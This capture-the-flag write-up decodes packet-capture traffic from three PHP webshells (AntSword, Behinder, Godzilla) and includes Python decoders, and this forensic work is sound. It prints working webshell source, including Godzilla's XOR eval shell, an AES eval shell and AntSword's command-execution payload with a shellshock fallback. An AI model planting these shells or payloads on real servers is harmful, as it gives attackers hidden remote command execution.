[Traffic Analysis] The Big Three Webshells

A traffic-analysis challenge containing traffic from three classic webshells.

webshell三巨头.pcapng

From the challenge name we can guess that it involves traffic from three different webshell tools; the three mainstream ones are AntSword (蚁剑), Behinder (冰蝎) and Godzilla (哥斯拉).

After opening the capture, three paths are requested: web2/shell1.php, web2/shell2.php and web2/shell3.php, so each one presumably corresponds to a different webshell.


Next, filter out the traffic of each shell separately. Taking shell1 as an example, the Wireshark filter is: http.request.full_uri contains "shell1.php" or http.response_for.uri contains "shell1.php"

Analyzing shell1

Judging from the request parameters and their characteristics, this looks like AntSword traffic: dropping the first two junk characters of each value and base64-decoding the rest yields the command to be executed.


All decoded commands:

cd /d "D:\0.phpstudy_pro\WWW\web2"&dir&echo [S]&cd&echo [E]    (list the directory)

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell1.php&echo [S]&cd&echo [E]    (view shell1.php)

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell2.php&echo [S]&cd&echo [E]    (view shell2.php)

cd /d "D:\0.phpstudy_pro\WWW\web2"&type shell3.php&echo [S]&cd&echo [E]    (view shell3.php)

D:/0.phpstudy_pro/WWW/web2/

D:/0.phpstudy_pro/WWW/web2/flag1.rar    (view flag1.rar)

The responses cannot be decoded with base64 alone; they are probably wrapped in an additional encryption layer or a modified encoding.

The response to the last request is plaintext, so we obtain flag1.rar, but the archive is password-protected.
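As an added example (my own code, not from this write-up or from AntSword), here is a Python decoder for the parameter layer described above: it drops the two junk characters from each POST value, base64-decodes the rest, reassembles the command line the way the payload does ("{$p} /c "{$s}" 2>&1" on Windows) and separates the command output from the working directory that the "echo [S]&cd&echo [E]" tail appends. The parameter names are the ones that appear in the decoded shell1.php payload later in this write-up; the request body and response text are constructed for the example, not captured traffic.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode

# Parameter names from the decoded shell1.php payload; values below are constructed.
PROG_PARAM = "p9e688b4ca0ab"
CMD_PARAM = "g530f39d333c62"
ENV_PARAM = "e872becae415ae"


def _wrap(value: str) -> str:
    """Transport form of these parameters: two junk characters, then base64 of the
    value. Used only to build the constructed sample body."""
    return "xx" + base64.b64encode(value.encode()).decode()


SAMPLE_BODY = urlencode({
    PROG_PARAM: _wrap("cmd"),
    CMD_PARAM: _wrap('cd /d "D:\\0.phpstudy_pro\\WWW\\web2"&dir&echo [S]&cd&echo [E]'),
    ENV_PARAM: _wrap(""),
    # The main payload parameter is AES ciphertext, so this layer cannot decode it;
    # random-looking constructed bytes stand in for it here.
    "ant": base64.b64encode(b"\x8f\x1e\xc0\x55\x7a\x03\xd9\x41" * 2).decode(),
})

# Constructed response: command output, then the working directory between the
# [S] and [E] markers that the command line itself echoes.
SAMPLE_RESPONSE = (
    "2023/10/23 08:35 170 flag1.rar\r\n"
    "2023/10/23 08:14 21 flag1.txt\r\n"
    "[S]\r\nD:\\0.phpstudy_pro\\WWW\\web2\r\n[E]\r\n"
)


def decode_antsword_params(body: str) -> dict:
    """Drop the first two characters of every POST value and base64-decode the rest,
    which is what substr($_POST[...],2) + base64_decode does in the payload.
    Values that are not valid base64/UTF-8 after that (e.g. the encrypted payload
    parameter) are returned as None rather than guessed at."""
    decoded = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        raw = values[0][2:]
        try:
            decoded[name] = base64.b64decode(raw, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            decoded[name] = None
    return decoded


def rebuild_command(params: dict, windows: bool = True) -> str:
    """Reassemble the line the payload runs: "{$p} {$c} 2>&1", where $c is
    '/c "<script>"' on Windows and '-c "<script>"' elsewhere."""
    flag = "/c" if windows else "-c"
    return f'{params[PROG_PARAM]} {flag} "{params[CMD_PARAM]}" 2>&1'


def split_antsword_output(text: str):
    """Separate the command output from the working directory appended via
    'echo [S]&cd&echo [E]'. Returns (output, cwd); cwd is None if absent."""
    output, marker, rest = text.partition("[S]")
    if not marker:
        return text, None
    cwd, _, _ = rest.partition("[E]")
    return output, cwd.strip()


if __name__ == "__main__":
    params = decode_antsword_params(SAMPLE_BODY)
    print(rebuild_command(params))
    print(split_antsword_output(SAMPLE_RESPONSE))
```

Run over a real capture, the same function applied to every POST body of shell1.php reproduces the command list above; the "ant" parameter coming back as None is the signal that another layer (the AES one analysed at the end of this write-up) sits underneath.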


Analyzing shell2.php

Looking through the series of requests and responses, each request body is one long base64 string and so is each response, with no key=value structure; this is judged to be Behinder traffic.

Trying to decrypt with the default key (rebeyond) succeeds.


Online decryption tool: https://the-x.cn/zh-cn/cryptography/Aes.aspx

Decrypting the last request and response

$mode="c2hvdw";$mode=base64_decode($mode);$path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvc2hlbGwxLnBocA";$path=base64_decode($path);$hash="";$blockIndex="";$blockSize="";$content="";$content=base64_decode($content);$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";$modifyTimeStamp="";main($mode,$path,$hash,$blockIndex,$blockSize,$content,$charset,$newpath,$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);

show D:/0.phpstudy_pro/WWW/web2/shell1.php

Response

{"status":"c3VjY2Vzcw==","msg":"UEQ5d2FIQU5Da0J6WlhOemFXOXVYM04wWVhKMEtDazdEUW9rY0hka1BTZGhiblFuT3cwS0pHdGxlVDFBYzNWaWMzUnlLSE4wY2w5d1lXUW9jMlZ6YzJsdmJsOXBaQ2dwTERFMkxDZGhKeWtzTUN3eE5pazdEUXBBWlhaaGJDaHZjR1Z1YzNOc1gyUmxZM0o1Y0hRb1ltRnpaVFkwWDJSbFkyOWtaU2drWDFCUFUxUmJKSEIzWkYwcExDQW5RVVZUTFRFeU9DMUZRMEluTENBa2EyVjVMQ0JQVUVWT1UxTk1YMUpCVjE5RVFWUkJmRTlRUlU1VFUweGZXa1ZTVDE5UVFVUkVTVTVIS1NrN0RRby9QZz09"}

This gives the content of shell1.php.

Continue decrypting

Request

$mode="c2hvdw";$mode=base64_decode($mode);$path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvc2hlbGwzLnBocA";$path=base64_decode($path);$hash="";$blockIndex="";$blockSize="";$content="";$content=base64_decode($content);$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";$modifyTimeStamp="";main($mode,$path,$hash,$blockIndex,$blockSize,$content,$charset,$newpath,$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);

show D:/0.phpstudy_pro/WWW/web2/shell3.php

Response

{"status":"c3VjY2Vzcw","msg":"UEQ5d2FIQU5DbVYyWVd3b0pGOVFUMU5VV3lKamRHWWlYU2s3RFFvPQ"}

This gives the content of shell3.php.

Request

$mode="ZG93bmxvYWRQYXJ0";$mode=base64_decode($mode);$path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvZmxhZzIucmFy";$path=base64_decode($path);$hash="";$blockIndex="MA";$blockIndex=base64_decode($blockIndex);$blockSize="MTA0ODU3Ng";$blockSize=base64_decode($blockSize);$content="";$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";$modifyTimeStamp="";main($mode,$path,$hash,$blockIndex,$blockSize,$content,$charset,$newpath,$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);

downloadPart D:/0.phpstudy_pro/WWW/web2/flag2.rar

Decrypt the response and save it as flag2.rar.


Response

驱动器 D 中的卷是 新加卷
卷的序列号是 700B-B7D2

D:\0.phpstudy_pro\WWW\web2 的目录

2023/10/23 08:35    <DIR>          .
2023/10/23 08:35    <DIR>          ..
2023/10/23 08:35 170 flag1.rar
2023/10/23 08:14 21 flag1.txt
2023/10/23 08:35 154 flag2.rar
2023/10/23 08:14 21 flag2.txt
2023/06/06 20:26 631,896 Rar.exe
2023/10/23 08:19 205 shell1.php
2023/10/23 08:19 205 shell1.txt
2023/09/29 16:44 299 shell2.php
2023/10/11 11:28 29 shell3.php
9 个文件 633,000 字节
2 个目录 334,656,536,576 可用字节
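Once the AES layer is off, the Behinder payloads above are plain PHP whose values are all unpadded base64. As an added example (my own code, not from this write-up or from Behinder), the following Python parser turns such a decrypted request into the one-line "mode path" form used above and unpacks the JSON response, whose status and msg values are base64 and whose msg, for file operations like show and downloadPart, carries the file content base64-encoded once more. The sample inputs are the "show shell3.php" and "downloadPart flag2.rar" requests and the "show" response as printed above; the inner_base64 switch is an assumption of this example for non-file operations.

```python
import base64
import json
import re


def b64(s: str) -> bytes:
    """Behinder strips the trailing '=' from its base64 values; restore it first."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


# Decrypted request bodies as shown above (show shell3.php, downloadPart flag2.rar)
SHOW_REQUEST = (
    '$mode="c2hvdw";$mode=base64_decode($mode);'
    '$path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvc2hlbGwzLnBocA";$path=base64_decode($path);'
    '$hash="";$blockIndex="";$blockSize="";$content="";$content=base64_decode($content);'
    '$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";$modifyTimeStamp="";'
    'main($mode,$path,$hash,$blockIndex,$blockSize,$content,$charset,$newpath,'
    '$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);'
)
DOWNLOAD_REQUEST = (
    '$mode="ZG93bmxvYWRQYXJ0";$mode=base64_decode($mode);'
    '$path="RDovMC5waHBzdHVkeV9wcm8vV1dXL3dlYjIvZmxhZzIucmFy";$path=base64_decode($path);'
    '$hash="";$blockIndex="MA";$blockIndex=base64_decode($blockIndex);'
    '$blockSize="MTA0ODU3Ng";$blockSize=base64_decode($blockSize);'
    '$content="";$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";'
    '$modifyTimeStamp="";main($mode,$path,$hash,$blockIndex,$blockSize,$content,'
    '$charset,$newpath,$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);'
)
# Decrypted response to the show request, as printed above
SHOW_RESPONSE = '{"status":"c3VjY2Vzcw","msg":"UEQ5d2FIQU5DbVYyWVd3b0pGOVFUMU5VV3lKamRHWWlYU2s3RFFvPQ"}'

ASSIGN = re.compile(r'\$(\w+)="([^"]*)"')
DECODED = re.compile(r'\$(\w+)=base64_decode\(\$\1\)')


def parse_behinder_request(payload: str) -> dict:
    """Collect every $name="value" assignment; values the payload itself passes
    through base64_decode() are decoded, the rest are kept verbatim."""
    encoded = set(DECODED.findall(payload))
    return {
        name: (b64(value).decode("utf-8") if name in encoded else value)
        for name, value in ASSIGN.findall(payload)
    }


def summarize(fields: dict) -> str:
    """One-line view of the operation, in the form used in the write-up."""
    line = f"{fields['mode']} {fields['path']}"
    if fields.get("blockIndex"):
        line += f" (block {fields['blockIndex']}, size {fields['blockSize']})"
    return line


def decode_behinder_response(body: str, inner_base64: bool = True):
    """Both JSON values are base64; for file operations such as show/downloadPart
    the msg value is itself base64 of the file content (inner_base64=True)."""
    obj = json.loads(body)
    status = b64(obj["status"]).decode("utf-8")
    msg = b64(obj["msg"])
    if inner_base64:
        msg = b64(msg.decode("ascii"))
    return status, msg


if __name__ == "__main__":
    for req in (SHOW_REQUEST, DOWNLOAD_REQUEST):
        print(summarize(parse_behinder_request(req)))
    status, content = decode_behinder_response(SHOW_RESPONSE)
    print(status, content)
```

Decoding the show response this way yields a 29-byte file, matching the shell3.php size in the directory listing above, which is a quick consistency check that the key and both base64 layers were handled correctly.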

Analyzing shell3

Here the value of the ctf parameter is relatively easy to understand.


After URL-decoding it, reversing the string and base64-decoding gives the following code:



@session_start();
@set_time_limit(0);
@error_reporting(0);
// XOR every byte of $D with a byte of the 16-byte key. The key index is ($i+1)&15
// (PHP's + binds tighter than &), so the first data byte is XORed with $K[1] and the
// index wraps every 16 bytes. XOR is symmetric, so this both encodes and decodes.
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='flag123';          // POST parameter name that carries the encoded payload
$payloadName='payload';   // session key under which the first-stage payload is cached
$key='03cbde474d6d8fe5';  // 16-byte XOR key
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        // later requests: eval the cached payload, then call its run() with the decoded data
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        // response framing: md5($pass.$key)[0:16] . base64(encode(output)) . md5($pass.$key)[16:]
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        // first request: the payload (identified by the string getBasicsInfo) is stored in the session
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

This is clearly a Godzilla shell, and both the pass and the key have been obtained, so the traffic can be decrypted.
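As an added example (my own code, not from this write-up or from Godzilla), here is the same encoding layer in Python, using the pass and key from the code above: a port of encode() with its (i+1)&15 key index, the request step base64_decode + XOR, and the response step that first verifies the md5($pass.$key) halves printed before and after the body. The sample request and response are constructed here with those same steps (the command string is one of the lines recovered below, the whoami output is made up); the parameter serialization Godzilla wraps inside this layer (the "cmdLine ... methodName" form shown below) is not modelled.

```python
import base64
import hashlib

# pass and key as they appear in the Godzilla code delivered through the ctf parameter
PASSWORD = "flag123"
KEY = b"03cbde474d6d8fe5"


def godzilla_xor(data: bytes, key: bytes = KEY) -> bytes:
    """Python equivalent of encode($D,$K): byte i is XORed with key[(i+1) & 15], so
    the key index starts at 1 and wraps every 16 bytes. XOR is its own inverse,
    so this function both encodes and decodes."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def decode_request(post_value: str, key: bytes = KEY) -> bytes:
    """$data=encode(base64_decode($_POST[$pass]),$key)"""
    return godzilla_xor(base64.b64decode(post_value), key)


def response_frame(password: str = PASSWORD, key: bytes = KEY):
    """The shell echoes md5($pass.$key)[0:16] before and md5($pass.$key)[16:32]
    after the base64 body; both halves are a fixed fingerprint of this shell."""
    digest = hashlib.md5(password.encode() + key).hexdigest()
    return digest[:16], digest[16:]


def decode_response(body: str, password: str = PASSWORD, key: bytes = KEY) -> bytes:
    """Check the md5 framing, then base64-decode and XOR the middle part."""
    head, tail = response_frame(password, key)
    if not (body.startswith(head) and body.endswith(tail)):
        raise ValueError("body is not framed with md5(pass.key): different shell or key")
    return godzilla_xor(base64.b64decode(body[len(head):-len(tail)]), key)


# Constructed samples, encoded here with the same XOR/base64 steps; the command
# string is one of the lines recovered in the write-up, the output is made up.
SAMPLE_CMD = b'cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&whoami" 2>&1'
SAMPLE_REQUEST = base64.b64encode(godzilla_xor(SAMPLE_CMD)).decode()
SAMPLE_OUTPUT = b"desktop-web2\\www\r\n"
SAMPLE_RESPONSE = (response_frame()[0]
                   + base64.b64encode(godzilla_xor(SAMPLE_OUTPUT)).decode()
                   + response_frame()[1])

if __name__ == "__main__":
    print(decode_request(SAMPLE_REQUEST))
    print(decode_response(SAMPLE_RESPONSE))
```

The framing check doubles as a detection aid: once pass and key are recovered from a shell sample, any HTTP response whose first and last 16 characters concatenate to md5(pass.key) belongs to this shell, regardless of what the XOR-encoded middle contains.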


Decrypting the traffic yields the operations that were executed:

cmdLine cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&ipconfig" 2>&1methodName

cmdLine 8 cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&whoami" 2>&1methodName

cmdLine cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&netstat -anplt" 2>&1methodName

cmdLine 5 cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar" 2>&1methodName

cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar a flag1.rar flag1.txt -p#ctf@flag123#" 2>&1methodName

cmd /c "cd /d "D:/0.phpstudy_pro/WWW/web2/"&rar a flag2.rar flag2.txt -p#flag@ctf123#" 2>&1methodName

methodName getFiledirName D:/0.phpstudy_pro/WWW/web2/

fileName D:/0.phpstudy_pro/WWW/web2/shell3.php methodName readFileContent

fileName D:/0.phpstudy_pro/WWW/web2/shell2.php methodName readFileContent

fileName D:/0.phpstudy_pro/WWW/web2/shell1.php methodName readFileContent

The important commands are the two rar lines: each compresses a flag txt file with a password. Together with the flag1.rar and flag2.rar obtained earlier, the archive passwords leaked here (#ctf@flag123# and #flag@ctf123#) let us extract the archives and obtain the flag.

flag{14db06b9-c7eb-4bc1-8d86-6e115c61e57d}

Follow-up analysis

Analysis of the other traffic yielded the content of shell1.php:

<?php
@session_start();
$pwd='ant';
$key=@substr(str_pad(session_id(),16,'a'),0,16);
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING));
?>

It uses AES-128-ECB; the key is derived from session_id (padded with 'a' to 16 characters, then the first 16 characters are kept), and the padding mode is given as well, so the request traffic can be decrypted directly.


Formatting the decrypted code:

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
	@session_start();
	$key=@substr(str_pad(session_id(),16,'a'),0,16);
	return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "34e"."bf7";
	echo @asenc($output);
	echo "7b63"."0d0c6";
}
ob_start();
try {
	$p=base64_decode(substr($_POST["p9e688b4ca0ab"],2));
	$s=base64_decode(substr($_POST["g530f39d333c62"],2));
	$envstr=@base64_decode(substr($_POST["e872becae415ae"],2));
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
	if(substr($d,0,1)=="/") {
		@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	} else {
		@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
	}
	if(!empty($envstr)) {
		$envarr=explode("|||asline|||", $envstr);
		foreach($envarr as $v) {
			if (!empty($v)) {
				@putenv(str_replace("|||askey|||", "=", $v));
			}
		}
	}
	$r="{$p} {$c}";
	function fe($f) {
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
			$d=array();
		} else {
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runshellshock($d, $c) {
		if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
			if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
				$tmp = tempnam(sys_get_temp_dir(), 'as');
				putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
				if (fe('error_log')) {
					error_log("a", 1);
				} else {
					mail("[email protected]", "", "", "-bv");
				}
			} else {
				return False;
			}
			$output = @file_get_contents($tmp);
			@unlink($tmp);
			if ($output != "") {
				print($output);
				return True;
			}
		}
		return False;
	}
	;
	function runcmd($c) {
		$ret=0;
		$d=dirname($_SERVER["SCRIPT_FILENAME"]);
		if(fe('system')) {
			@system($c,$ret);
		} elseif(fe('passthru')) {
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
			print(@shell_exec($c));
		} elseif(fe('exec')) {
			@exec($c,$o,$ret);
			print(join("\n",$o));
		} elseif(fe('popen')) {
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
				print(@fgets($fp,2048));
			}
			@pclose($fp);
		} elseif(fe('proc_open')) {
			$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
			while(!@feof($io[1])) {
				print(@fgets($io[1],2048));
			}
			while(!@feof($io[2])) {
				print(@fgets($io[2],2048));
			}
			@fclose($io[1]);
			@fclose($io[2]);
			@proc_close($p);
		} elseif(fe('antsystem')) {
			@antsystem($c);
		} elseif(runshellshock($d, $c)) {
			return $ret;
		} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
			$w=new COM('WScript.shell');
			$e=$w->exec($c);
			$so=$e->StdOut();
			$ret.=$so->ReadAll();
			$se=$e->StdErr();
			$ret.=$se->ReadAll();
			print($ret);
		} else {
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={$ret}":"";
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

Looking at the asoutput and asenc functions, the response body is also AES-encrypted with the same session_id-derived key, and fixed junk strings are added around it ("34ebf7" before and "7b630d0c6" after); the response is decrypted by reversing this encryption logic.
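As an added example (my own code, not from this write-up or from AntSword), here is a Python decoder for both directions of this AES layer: key derivation as in str_pad(session_id(),16,'a') truncated to 16, request decryption with no padding removed (the shell uses OPENSSL_ZERO_PADDING), and response decryption that strips the junk prefix/suffix, removes the PKCS#7 padding openssl_encrypt added in asenc() and undoes the inner base64_encode($out). It assumes the Python cryptography package is installed; the session id is made up, the sample request and response are constructed with the same primitives, and the client-side space padding used to build the sample request is an assumption of this example.

```python
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Fixed junk strings that asoutput() prints around the encrypted body
PREFIX = "34e" + "bf7"
SUFFIX = "7b63" + "0d0c6"


def antsword_key(session_id: str) -> bytes:
    """$key=@substr(str_pad(session_id(),16,'a'),0,16): right-pad with 'a' to 16
    characters, then keep the first 16. PHP session ids are normally longer than 16,
    so in practice the key is simply their first 16 characters."""
    return session_id.ljust(16, "a")[:16].encode()


def _cipher(session_id: str) -> Cipher:
    return Cipher(algorithms.AES(antsword_key(session_id)), modes.ECB())


def decrypt_request(post_value: str, session_id: str) -> str:
    """The value of the 'ant' parameter: base64 -> AES-128-ECB. The shell decrypts
    with OPENSSL_ZERO_PADDING, so no padding is removed here either; whatever the
    client used to fill the last block remains at the end of the PHP code."""
    dec = _cipher(session_id).decryptor()
    return (dec.update(base64.b64decode(post_value)) + dec.finalize()).decode("utf-8")


def decrypt_response(body: str, session_id: str) -> str:
    """Strip the junk prefix/suffix, base64-decode, AES-decrypt, remove the PKCS#7
    padding (OPENSSL_RAW_DATA alone keeps padding enabled in openssl_encrypt),
    then undo the inner base64_encode($out) from asenc()."""
    if not (body.startswith(PREFIX) and body.endswith(SUFFIX)):
        raise ValueError("body is not framed the way asoutput() frames it")
    dec = _cipher(session_id).decryptor()
    padded = dec.update(base64.b64decode(body[len(PREFIX):-len(SUFFIX)])) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted body")
    return base64.b64decode(padded[:-pad]).decode("utf-8")


# --- constructed sample traffic (built with the same primitives, not captured) ---
SESSION_ID = "abcdefghijklmnopqrstuvwxyz"   # made-up PHPSESSID value


def _encrypt_request(php: str, session_id: str) -> str:
    # Assumption: the client pads the code to a block boundary itself, because the
    # server decrypts with ZERO_PADDING; trailing spaces are harmless to eval().
    data = php.encode()
    data += b" " * (-len(data) % 16)
    enc = _cipher(session_id).encryptor()
    return base64.b64encode(enc.update(data) + enc.finalize()).decode()


def _encrypt_response(output: str, session_id: str) -> str:
    data = base64.b64encode(output.encode())
    pad = 16 - len(data) % 16
    data += bytes([pad]) * pad                      # PKCS#7, as openssl_encrypt does
    enc = _cipher(session_id).encryptor()
    return PREFIX + base64.b64encode(enc.update(data) + enc.finalize()).decode() + SUFFIX


SAMPLE_REQUEST = _encrypt_request('@ini_set("display_errors", "0");echo "ok";', SESSION_ID)
SAMPLE_RESPONSE = _encrypt_response("ok", SESSION_ID)

if __name__ == "__main__":
    print(decrypt_request(SAMPLE_REQUEST, SESSION_ID))
    print(decrypt_response(SAMPLE_RESPONSE, SESSION_ID))
```

On a real capture the session id comes from the PHPSESSID cookie of the same TCP stream; because the key is nothing more than that cookie value, anyone holding the pcap can decrypt the whole exchange, which is why this "encryption" hides the traffic from signature matching but not from an analyst.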


With that, all of the request and response traffic of shell1 (AntSword) can be decoded.